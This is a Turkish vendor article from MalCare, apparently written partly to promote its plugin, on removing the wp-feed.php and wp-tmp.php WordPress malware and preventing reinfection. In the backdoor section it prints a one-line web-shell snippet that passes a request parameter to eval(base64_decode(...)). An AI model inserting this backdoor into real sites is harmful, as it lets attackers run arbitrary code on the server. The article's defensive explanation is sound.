WordPress'teki Wp-Feed.php ve Wp-Tmp.php Kötü Amaçlı Yazılımlarını Düzeltme - MalCare

Kötü amaçlı yazılım tarayıcınız sizi "sitenizin saldırıya uğradığı" konusunda uyarıyor, ancak bu sizin için iyi görünüyor mu?

Ziyaretçiler, WordPress web sitenizdeki spam reklamlardan şikayet ediyor, ancak siz hiç görmüyor musunuz?

Sitenizin saldırıya uğrama olasılığı yüksektir.

Bilgisayar korsanları, bilgisayar korsanlarını site sahiplerinden gizlemenin akıllı yollarını bulur, böylece fark edilmeden kalırlar ve web sitesini uzun süre kullanmaya devam edebilirler.

wp-feed.php, orada en zekice gizlenmiş bilgisayar korsanlarından biridir.

Site sahiplerinden gizlenerek, ziyaretçilerinize yasa dışı ürünler, uyuşturucular ve yetişkinlere uygun içerik reklamları gösterir.

Tespit edebilmiş olsanız bile, enfeksiyonun yayıldığı tüm yerleri bulmak hem zor hem de bazen imkansızdır. Enfeksiyonun çıkarılması karmaşık ve zordur. Kaldırmayı başarırsanız, 10 vakanın 8'inde enfeksiyon yeniden ortaya çıkar.

Alt satır: Bir wp-feed.php enfeksiyonunu bir WordPress web sitesinden kaldırmak zordur.

Neyse ki, bu kötü amaçlı yazılımla daha önce sayısız kez uğraştık. Son on yılda, wp-feed'i yüzlerce ve binlerce WordPress web sitesinden başarıyla kaldırmakla kalmadık, aynı zamanda yeniden bulaşmaları da önledik.

Merak etme. Emin ellerdesin.

Bu makalede şunları öğreneceksiniz:

• Kötü amaçlı wp-feed.php nasıl çalışır ve web sitenizi nasıl etkiler?
• Sitenizden nasıl kaldırılır
• Gelecekte yeniden bulaşmalar nasıl önlenir?

TL;DR : wp-feed.php enfeksiyonunu kaldırmak için tek yapmanız gereken WordPress Kötü Amaçlı Yazılım Temizleme aracımızı yüklemek ve Otomatik Temizleme işlevini çalıştırmaktır. Eklenti ayrıca, yeniden bulaşmaya olanak tanıyan web sitesi arka kapılarını kaldırarak yeniden bulaşmayı önlemeye yardımcı olur ve bir güvenlik duvarı ve oturum açma korumasıyla kötü amaçlı trafiğin sitenize erişmesini engeller.

wp-feed.php & wp-tmp.php nedir? (Nedenleri, Belirtileri ve Yeniden Enfeksiyonlar)

Özetle: WP-Feed, web sitelerinde kötü amaçlı reklamlar görüntüleyen bir kötü amaçlı yazılım türüdür. Amaç, ziyaretçilerinizin reklamları tıklamasını sağlamak ve onları kötü amaçlı bir web sitesine yönlendirmektir.

Merak ediyor olmalısın –

> Web siteme nasıl virüs bulaştı?

Bulaşma genellikle geçersiz eklentilerin veya temaların kullanımından kaynaklanır.

Nulled yazılımlar, size ücretsiz olarak birinci sınıf özellikler sundukları için caziptir. Birçok kişi, sıfırlanan yazılımın bir hayırseverlik eylemi olarak dağıtıldığına inanıyor.

Bu genellikle durumdan uzaktır. Bilgisayar korsanlarının sitenize zahmetsizce erişebilmesi için geçersiz yazılım dağıtılır.

Nulled eklentiler veya temalar kötü amaçlı yazılımlarla doludur. Web sitenize boş bir tema veya eklenti yüklediğinizde, temel olarak bilgisayar korsanlarının sitenize erişmesi için kapılar açmış olursunuz.

Sıfırlanan yazılımların yanı sıra, güncelliğini yitirmiş eklentiler ve temalar da savunmasız olabilir. Bilgisayar korsanları, sitenize girmek için bu güvenlik açıklarından yararlanır.

Ayrıca "admin" ve "p@ssword" gibi zayıf kullanıcı adları ve parolalardan da yararlanırlar. Zayıf kimlik bilgilerinin tahmin edilmesi kolaydır.

Bir bilgisayar korsanı, kullanıcı adınızı ve giriş bilgilerinizi tahmin edebilir ve wp-feed.php kötü amaçlı yazılımını doğrudan web sitenize yerleştirebilir.

> Bilgisayar korsanları neden sitelere wp-feed.php bulaştırıyor?

Amaç, ziyaretçilerinizi çalmak ve bilgisayar korsanlarının gelir elde edebilmesi için onları sahte hizmetler veya ürünler satın almaları için kandırmaktır.

Gerçekten şaşırtıcı olan şey, site sahibi tek bir ipucu bile almadan bunu başarabilmeleridir.

Bu da bizi şu soruya getiriyor –

> Bu enfeksiyonun belirtilerini fark etmek neden zor?

Bilgisayar korsanları web sitenize erişim sağladıktan sonra, wp-includes klasörünüze iki dosya (wp-feed.php & wp-tmp.php) yerleştirirler.

Wp-includes klasörü, WordPress çekirdeğinizin bir parçasıdır. Web sitenizin temasının bulunduğu yerdir.

WP besleme dosyası, diğer WordPress dosyalarını, özellikle aktif temanızın bir parçası olan function.php'yi etkilemeye başlar.

Bilgisayar korsanları, function.php içinden WordPress web sitenizde kötü amaçlı açılır reklamlar görüntüleyebilir.

Ancak asıl şeytani kısım , reklamların yalnızca yeni ziyaretçilere gösterilmesi , tekrarlanan ziyaretçilere gösterilmemesidir. Kötü amaçlı yazılım, reklamların yalnızca yeni ziyaretçilere gösterilmesini sağlamak için sitenizin ziyaretçilerini kaydeder. Bu, tespit edilmeyi önlemenin dahiyane bir yoludur.

Bu nedenle, kendi sitenizi sık sık ziyaret eden biri olarak, herhangi bir saldırı belirtisini asla fark etmezsiniz.

wp-feed.php Kötü Amaçlı Yazılım Nasıl Temizlenir?

Enfeksiyonu ortadan kaldırmanın iki yolu vardır. Onlar -

1. Bir eklenti kullanmak (kolay)

2. Manuel olarak yapmak (zor)

Her yöntemi inceleyelim.

1. WP-Feed.php Kötü Amaçlı Yazılımını Eklenti İle Kaldırma (kolay yol)

Bazılarınızın web sitenizde zaten kurulu bir güvenlik eklentisi olabilir. Kötü amaçlı dosyalar hakkında sizi uyaran muhtemelen bu eklentiydi – wp-includes/wp-feed.php ve wp-includes/wp-tmp.php .

Çoğu güvenlik eklentisi, kötü amaçlı yazılım temizleme hizmetleri sunar, ancak çok azı bunu MalCare Security kadar hızlı ve etkili bir şekilde yapabilir.

• MalCare sitenizi 60 saniyenin altında temizleyecektir. Bilet yükseltmek zorunda değilsiniz. Sırada beklemek zorunda değilsiniz. Sitenizin kimlik bilgilerini 3. taraf bir eklentiye teslim etmeniz gerekmez.

• Sadece bu da değil, eklenti gizli kötü amaçlı yazılımları arayarak her kuytu köşeye kadar giriyor. Sitenizde bulunan her bir kötü amaçlı komut dosyasını bulur.

• Yeni ve iyi gizlenmiş kötü amaçlı yazılımları tespit etmek için geleneksel olmayan yöntemler kullanır. Kötü niyetli amacı belirlemek için kodun davranışını kapsamlı bir şekilde analiz eder. Bu aynı zamanda iyi kodu bad olarak işaretlemediğinden emin olmanıza da yardımcı olur.

• Bunların hepsini birkaç dakika içinde yapıyor.

MalCare ile wp-feed.php enfeksiyonunu temizleyelim.

Adım 1: WordPress web sitenize MalCare Security'yi kurun ve etkinleştirin.

Adım 2: Pano menünüzden MalCare'i seçin. E-posta adresinizi girin ve Şimdi Güvenli Siteye tıklayın.

3. Adım: Bir sonraki sayfada, bir şifre girmeniz ve ardından URL'nizi girmeniz istenecektir.

MalCare web sitenizi hemen taramaya başlayacaktır. Amaç, web sitenizde bulunan her bir kötü amaçlı kod örneğini bulmaktır.

Bu, yalnızca wp-feed.php ve wp-tmp.php dosyalarını değil, function.php dosyasında saklanan örnekler de dahil olmak üzere WordPress dosyalarınıza bulaşan tüm kötü amaçlı kodları algılayacağı anlamına gelir.

Yeniden bulaşmaları önlemek için eklentinin sitenizde bulunan her bir arka kapıyı da bulacağından emin olabilirsiniz.

Kötü amaçlı komut dosyalarını bulduğunuzda, eklenti sizi bu konuda uyaracaktır.

Ardından, sitenizi temizlemeniz gerekir.

Lütfen MalCare'in kötü amaçlı yazılım temizleme özelliğinin birinci sınıf bir özellik olduğunu unutmayın. Piyasadaki tek anında kötü amaçlı yazılım temizleme eklentisidir . Yılda 99 ABD Doları karşılığında, tek bir siteyi istediğiniz kadar temizleyebilir ve sahip olabileceğiniz en iyi korumaya sahip olduğunuzdan emin olabilirsiniz. MalCare Fiyatlandırması hakkında daha fazla bilgi edinin .

Adım 4: Web sitenizden wp-feed.php'nin her izini kaldırmak için tek yapmanız gereken Otomatik Temizleme düğmesine tıklamak.

MalCare anında sitenizi temizlemeye başlayacak.

İşte bu millet. Web sitenizi bir eklenti ile bu şekilde temizlersiniz.

2. WP-Feed.php Kötü Amaçlı Yazılımını Manuel Olarak Kaldırın (zor yol)

Enfeksiyonu manuel olarak ortadan kaldırmak oldukça zordur, çünkü bu tür bir enfeksiyonda birçok hareketli parça vardır.

• Bilgisayar korsanı iki kötü amaçlı dosya yükler – wp-feed.php & wp-tmp.php. Başlamak için bunları kaldırmanız gerekir. Bu muhtemelen tek kolay kısım.
• Enfeksiyon, function.php dosyası da dahil olmak üzere diğer WordPress dosyalarına yayılır. Bu zor, çünkü enfeksiyonun nereye yayıldığını kim söyleyebilir?
  
  • Tüm kötü amaçlı kodu bulmanız saatler alacaktır.
  • İyi gizlenmiş oldukları ve normal kod parçaları gibi göründükleri için kötü amaçlı kodu tanımak zordur.
  • "eval(base64_decode)" gibi bilinen bazı kötü niyetli kodlar meşru eklentilerin parçası olabilir. Kötü amaçlı kullanılmazlar. Bu nedenle, kodu silmek eklentinizi etkiler ve hatta sitenizi bozabilir.
  • Yeniden bulaşmaya yol açabilecek kod parçalarını gözden kaçırma olasılığınız oldukça yüksektir.

El kaldırma, bu nedenle, hiç de etkili değil.

Ancak, yine de yapmak istiyorsanız, lütfen web sitenizin tam bir yedeğini alın. Yanlışlıkla bir şeyi siler ve sitenizi bozarsanız, onu hızla normale döndürebilirsiniz.

İşte tercih edebileceğiniz en iyi yedekleme hizmetlerinin bir listesi.

Ve işte kötü amaçlı yazılımı manuel olarak kaldırmanıza yardımcı olacak bir makale – WordPress hacklendi. “Saldırıya Uğramış Bir WordPress Web Sitesini Manuel Olarak Temizleme” bölümüne atlayın.

Web siteniz artık virüs bulaşmamış, ancak güvenli olmaktan çok uzak. Bilgisayar korsanları yine de sitenizi hedefleyebilir ve sitenize virüs bulaştırmaya çalışabilir. Sitenizin gelecekteki enfeksiyonlardan korunduğundan emin olmanız gerekir. Ancak buna girmeden önce, wp-feed.php & wp-tmp.php enfeksiyonunun etkisine bir göz atalım.

wp-temp.php Kötü Amaçlı Yazılım Enfeksiyonunun Etkisi

wp-feed.php ve wp-tmp.php kötü amaçlı yazılımlarının web siteniz üzerinde yıkıcı bir etkisi olabileceğini söylemeye gerek yok.

wp-temp.php ile enfekte olmuş web siteleri genellikle aşağıdaki sonuçlara maruz kalır:

• Hemen çıkma oranında bir sıçrama ve ziyaretçilerin web sitenizde geçirdikleri sürenin azaldığını fark edeceksiniz.

• Açılır reklamlar, web sitenizi ağır ve gerçekten yavaş hale getirecektir.

• Kimse yavaş bir web sitesini sevmez, bu nedenle ziyaretçilerin sayfalarınız tarayıcıda yüklenmeden önce geri düğmesine basması muhtemeldir. Bu bir domino etkisi yaratacaktır.

• Arama motorları, insanların sitenizden ne kadar hızlı ayrıldığını fark edecektir. Kullanıcıların aradıklarını sunmadığınız sonucuna varacaklar. Arama motoru sıralamanız düşecek .

• Bu, SERP'lerde daha üst sıralarda yer almak için harcamış olabileceğiniz tüm çaba, zaman ve paranın boşa gittiği anlamına gelir.

• Saldırıya uğrayan web siteleri Google tarafından kara listeye alınır ve barındırma sağlayıcıları tarafından askıya alınır . Ayrıca saldırıya uğrayan sitelerde google reklamları yayınlanıyorsa adwords hesabı askıya alınır. Bütün bunlar trafiğe daha fazla dalmaya yol açacaktır.

• Ayrıca, saldırıya uğramış web sitelerinin temizlenmesi gerekir ki bu , doğru araçları kullanmıyorsanız pahalı bir iş olabilir.

İyi haber şu ki, sitenizin saldırıya uğradığını biliyorsunuz. Bu nedenle temizleyebilir ve darbeyi durdurabilirsiniz.

Gelecekte Sitenizi wp-feed.php Kötü Amaçlı Yazılımlarından Nasıl Korursunuz?

Okuyucularımızın çoğu wp-feed.php kötü amaçlı yazılımını sitelerinden kaldırmayı denemiş ancak kötü amaçlı yazılımın geri gelmeye devam ettiğini keşfetmiş olabilir.

Bunun nedeni, sitenizde kurulu bir arka kapı olmasıdır. Çoğu arka kapı son derece iyi gizlenmiştir, öyle ki amatör geliştiriciler tarafından meşru kod olarak geçiştirilebilirler.

Önceki bir bölümde, bilgisayar korsanlarının web sitenizin koduna wp-feed.php ve wp-tmp.php adlı iki dosya eklediklerini açıklamıştık. wp-tmp.php dosyası bir arka kapı görevi görür. Dosyayı açarsanız, buna benzeyen bir komut dosyası bulacaksınız –

 $p = $REQUEST$#91;”m”]; eval(base64_decode ($p));

İyi haber şu ki, aşağıdaki önlemleri alarak sitenizi gelecekteki saldırı girişimlerinden koruyabilirsiniz –

1. Nulled Yazılımı Silin ve Kullanmayı Durdurun

Web sitenizde geçersiz bir eklenti veya tema kullanıyorsanız, hemen silin .

Bilgisayar korsanları, ilk etapta geçersiz yazılım kullanarak sitenize erişim sağladı. Sitenizi ne kadar iyi temizlerseniz temizleyin, geçersiz yazılımları kaldırmazsanız, bilgisayar korsanları sitenize girmenin yolunu bulur ve kötü amaçlı yazılım yerleştirir.

Kullanıcılarınıza eklentileri ve temaları yükleme izni verdiyseniz, hiçbir zaman boş yazılım kullanmadıklarından emin olun.

Aslında, MalCare'in yardımıyla eklentilerin ve temaların yüklenmesini tamamen önlemek için pratik yapmak daha iyidir.

Tek yapmanız gereken MalCare'in panosunda oturum açmak, web sitenizi seçmek, Sertleştirmeyi Uygula'ya tıklamak ve Blok Eklenti/Tema Kurulumunu etkinleştirmek.

2. Site Güvenliğinizi Sertleştirin

Dosya izinlerini değiştirerek bilgisayar korsanlarının wp-feed.php gibi kötü amaçlı dosyaları WordPress klasörlerinize yerleştirmesini önleyebilirsiniz.

Dosya izinleri, kimin hangi dosyalara erişebileceğini belirleyen bir dizi kuraldır. Kullanıcıların wp-includes klasöründe değişiklik yapmasını engelleyebilirsiniz. Dosya izinlerini daha derinlemesine anlamak için şu kılavuza göz atın: WordPress Dosya İzinleri.

Dosya düzenleyiciyi devre dışı bırakarak bilgisayar korsanlarının temanızı değiştirmesini de engelleyebilirsiniz. Bu, web sitenize pop-up reklamlar enjekte etmelerini önleyecektir. Manuel olarak yapabilirsiniz ancak risklidir ve önerilmez.

Sitenizde zaten MalCare kuruluysa, tek yapmanız gereken dosya düzenleyiciyi devre dışı bırakmak için bir düğmeyi tıklatmaktır.

WordPress güçlendirme hakkında daha fazla bilgi edinin.

3. Web Sitenizi Güncel Tutun

Tıpkı diğer tüm yazılımlar gibi, WordPress eklentileri ve temaları da güvenlik açıkları geliştirir. Geliştiriciler bu güvenlik açığını öğrendiklerinde, hızla bir yama oluşturur ve bunu bir güncelleme biçiminde yayınlarlar.

Güncellemelerin uygulanmasında herhangi bir gecikme olması sitenizi riske atar.

Bilgisayar korsanları güvenlik açıklarından yararlanma konusunda iyidir . Aslında, siteye erişmek ve siteye kötü amaçlı yazılım bulaştırmak için kullanabilmeleri için her zaman güvenlik açıkları olan web sitelerini ararlar.

Bu nedenle, güncellemeleri asla geciktirmeyin.

Güvenlik güncellemeleri hakkında buradan daha fazla bilgi edinebilirsiniz – WordPress Güvenlik Güncellemeleri.

İşte sitenizi güncel tutmanıza yardımcı olacak bir kılavuz – WordPress Nasıl Güncellenir.

4. Güçlü Kimlik Bilgilerinin Kullanımını Zorunlu Hale Getirin

Web sitenize erişmenin en kolay yolu giriş sayfanızdır.

Bilgisayar korsanının kullanıcı kimlik bilgilerinizi başarılı bir şekilde tahmin etmesi yeterlidir. Aslında, birkaç dakika içinde yüzlerce kullanıcı adı ve şifre kombinasyonunu deneyebilen botlar tasarlıyorlar. Siz veya ekip arkadaşlarınızdan herhangi biri "admin" ve "password123" gibi tahmin etmesi kolay kimlik bilgileri kullanıyorsanız, botların sitenize girmesi 2 saniye sürer. Buna kaba kuvvet saldırısı denir.

Web sitenizdeki her kullanıcının benzersiz kullanıcı adları ve güçlü parolalar kullandığından emin olmanız önemlidir.

Hatta bunun ötesine geçebilir ve oturum açma sayfanızı korumak için çeşitli önlemler uygulayabilirsiniz. Alabileceğiniz WordPress oturum açma güvenlik önlemlerinin bir listesini derledik.

5. Bir Güvenlik Duvarı Kullanın

Bilgisayar korsanlarının web sitenize girmesini en başta engelleyebilseniz harika olmaz mıydı?

Bir güvenlik duvarı tam da ihtiyacınız olan araçtır.

Sitenize erişmek isteyen trafiği araştırır . Trafiğin kötü niyetli bir IP adresinden kaynaklandığını tespit ederse, güvenlik duvarı trafiği derhal engeller.

Bu şekilde bilgisayar korsanlarını ve botları filtreler.

İşte sitenizde etkinleştirebileceğiniz en iyi WordPress güvenlik duvarlarının bir listesi.

Ancak, MalCare kullanıyorsanız, sitenizde zaten etkinleştirilmiş bir güvenlik duvarınız var demektir.

Sırada ne var?

Size sitenizi nasıl temizleyeceğinizi ve bir daha asla saldırıya uğramamanızı nasıl sağlayacağınızı gösterdik.

Web sitenizi bir dizi felaketten kurtaracağını düşündüğümüz bir tavsiye, web sitenizin düzenli olarak yedeğini alın.

Web siteniz ister aniden bir hata veriyor, ister bozuk olsun, bir yedekleme, sitenizi geçici olarak hızlı bir şekilde düzeltmenize yardımcı olacaktır.

MalCare Security'ye abone olursanız, ek bir ücret karşılığında bir yedekleme eklentisinden de yararlanabilirsiniz. Daha fazlasını öğrenmek için bizimle iletişime geçin.

MalCare Güvenlik Eklentisini Bir Deneyin !